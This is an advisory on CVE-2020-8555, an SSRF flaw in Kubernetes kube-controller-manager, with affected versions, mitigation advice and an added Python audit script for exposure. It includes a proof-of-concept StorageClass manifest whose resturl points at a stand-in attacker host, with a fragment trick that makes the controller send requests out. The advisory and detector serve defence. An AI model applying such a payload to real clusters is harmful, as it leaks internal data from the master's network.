Summary:
Kubernetes is an open source container orchestration system for automating application deployment, management and scaling. A security flaw in Kubernetes was disclosed on June 1, 2020: a Server Side Request Forgery (SSRF) vulnerability exists in kube-controller-manager. It allows an attacker to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network. The issue was assigned CVE-2020-8555.
Description:
An attacker with permission to create a pod using certain built-in volume types (GlusterFS, Quobyte, StorageOS, ScaleIO), or with permission to create a StorageClass, creates a pod and attaches such a volume to it. Through the volume attachment or the StorageClass creation, the attacker causes the kube-controller-manager component to issue GET or POST requests (without an attacker-controlled request body) from the master's host network, which leaks arbitrary information from unprotected endpoints reachable from that network.
Affected Products:
kube-controller-manager v1.18.0
kube-controller-manager v1.17.0 – v1.17.4
kube-controller-manager v1.16.0 – v1.16.8
kube-controller-manager < v1.15.11
Exploitation:
During volume creation, the controller appends /volumes to the user-provided URL given in the resturl parameter. A trailing # (URL fragment) was used to neutralise this unwanted path suffix, since everything after the fragment marker is never sent to the server.
YAML payload used to trigger the half-blind SSRF (the sc-poc.yaml file applied below):

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
    - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf
Once the manifest was applied, the kube-controller-manager handled the provisioning and issued the resulting HTTP request:
kubectl create -f sc-poc.yaml
Request received, as seen from the attacker's listener:
Image Source: medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8
See the references below for more details about the vulnerability.
Mitigation:
The vendor has released an official advisory and patched versions. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster.
As per the advisory, "Prior to upgrading, this vulnerability can also be mitigated by adding some endpoint protections on the master or restricting usage of the vulnerable volume types and restricting StorageClass write permissions through RBAC".
Qualys customers can scan their network with QID(s)#48047 to detect the assets. Please continue to follow on Qualys Threat Protection for more coverage on these vulnerabilities.
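The following is an added example, not code from the original advisory, from Qualys or from the Kubernetes project. It turns two points made above into an offline check a cluster owner can run: the affected kube-controller-manager version ranges from the "Affected Products" list, and the mitigation of restricting the vulnerable volume types and reviewing StorageClass parameters. It also shows, with a small helper, why the trailing # in resturl defeats the /volumes suffix the controller appends. The StorageClass objects are constructed sample input in the shape `kubectl get storageclass -o json` returns; the function names, the allow-list argument and the host `heketi.storage.svc` are this example's own assumptions.

```python
"""Offline audit for CVE-2020-8555 exposure (added example, not part of the
original advisory). Input is the JSON shape of `kubectl get storageclass -o json`;
the sample below is constructed, not captured from a real cluster."""
import json
from urllib.parse import urlsplit, urlunsplit

# In-tree provisioners whose parameters drive controller-side HTTP requests in
# the affected releases, as named in the advisory text (StorageOS, not a typo).
VULNERABLE_PROVISIONERS = {
    "kubernetes.io/glusterfs",
    "kubernetes.io/quobyte",
    "kubernetes.io/storageos",
    "kubernetes.io/scaleio",
}


def parse_version(v):
    """Turn 'v1.17.3', '1.17.3' or '1.17.3-gke.1' into the tuple (1, 17, 3)."""
    core = v.lstrip("v").split("-")[0].split("+")[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected_version(v):
    """Affected ranges from the advisory: v1.18.0, v1.17.0-v1.17.4,
    v1.16.0-v1.16.8, and anything below v1.15.11."""
    major, minor, patch = parse_version(v)
    if (major, minor) == (1, 18):
        return patch == 0
    if (major, minor) == (1, 17):
        return patch <= 4
    if (major, minor) == (1, 16):
        return patch <= 8
    return (major, minor, patch) < (1, 15, 11)


def effective_request_url(resturl, suffix="/volumes"):
    """What actually reaches the server after the controller appends `suffix`.
    A URL fragment is never transmitted, so a resturl ending in '#' swallows
    the appended path: the request goes to the bare attacker-chosen URL."""
    parts = urlsplit(resturl + suffix)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, parts.query, ""))


def audit_storage_classes(items, allowed_hosts):
    """Return (name, provisioner, reason) for every StorageClass that uses a
    vulnerable provisioner; add detail when resturl carries a fragment or
    points at a host outside the allow-list of known storage endpoints."""
    findings = []
    for sc in items:
        prov = sc.get("provisioner", "")
        if prov not in VULNERABLE_PROVISIONERS:
            continue
        name = sc["metadata"]["name"]
        reasons = ["uses vulnerable provisioner %s" % prov]
        resturl = sc.get("parameters", {}).get("resturl")
        if resturl:
            if "#" in resturl:
                reasons.append("resturl contains a fragment (appended path is dropped)")
            host = urlsplit(resturl).hostname
            if host not in allowed_hosts:
                reasons.append("resturl host %r not in allow-list" % host)
        findings.append((name, prov, "; ".join(reasons)))
    return findings


# Constructed sample: one PoC-style class, one legitimate GlusterFS class,
# one unrelated class that must not be flagged.
SAMPLE_STORAGECLASSES = json.loads("""
{"items": [
  {"metadata": {"name": "poc-ssrf"}, "provisioner": "kubernetes.io/glusterfs",
   "parameters": {"resturl": "http://attacker.example:6666/#"}},
  {"metadata": {"name": "gluster-prod"}, "provisioner": "kubernetes.io/glusterfs",
   "parameters": {"resturl": "http://heketi.storage.svc:8080"}},
  {"metadata": {"name": "standard"}, "provisioner": "kubernetes.io/aws-ebs",
   "parameters": {"type": "gp2"}}
]}
""")

if __name__ == "__main__":
    print("kube-controller-manager v1.17.3 affected:", is_affected_version("v1.17.3"))
    for name, prov, why in audit_storage_classes(
        SAMPLE_STORAGECLASSES["items"], {"heketi.storage.svc"}
    ):
        print("%s (%s): %s" % (name, prov, why))
```

The allow-list is the part a cluster owner must fill in: the hostnames of the real Heketi, Quobyte, StorageOS or ScaleIO endpoints. Any StorageClass with a vulnerable provisioner is reported regardless, since the advisory's interim mitigation is to restrict those volume types and the RBAC rights to write StorageClasses, not merely to vet their URLs.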
References and Sources:
https://github.com/kubernetes/kubernetes/issues/91542
https://medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8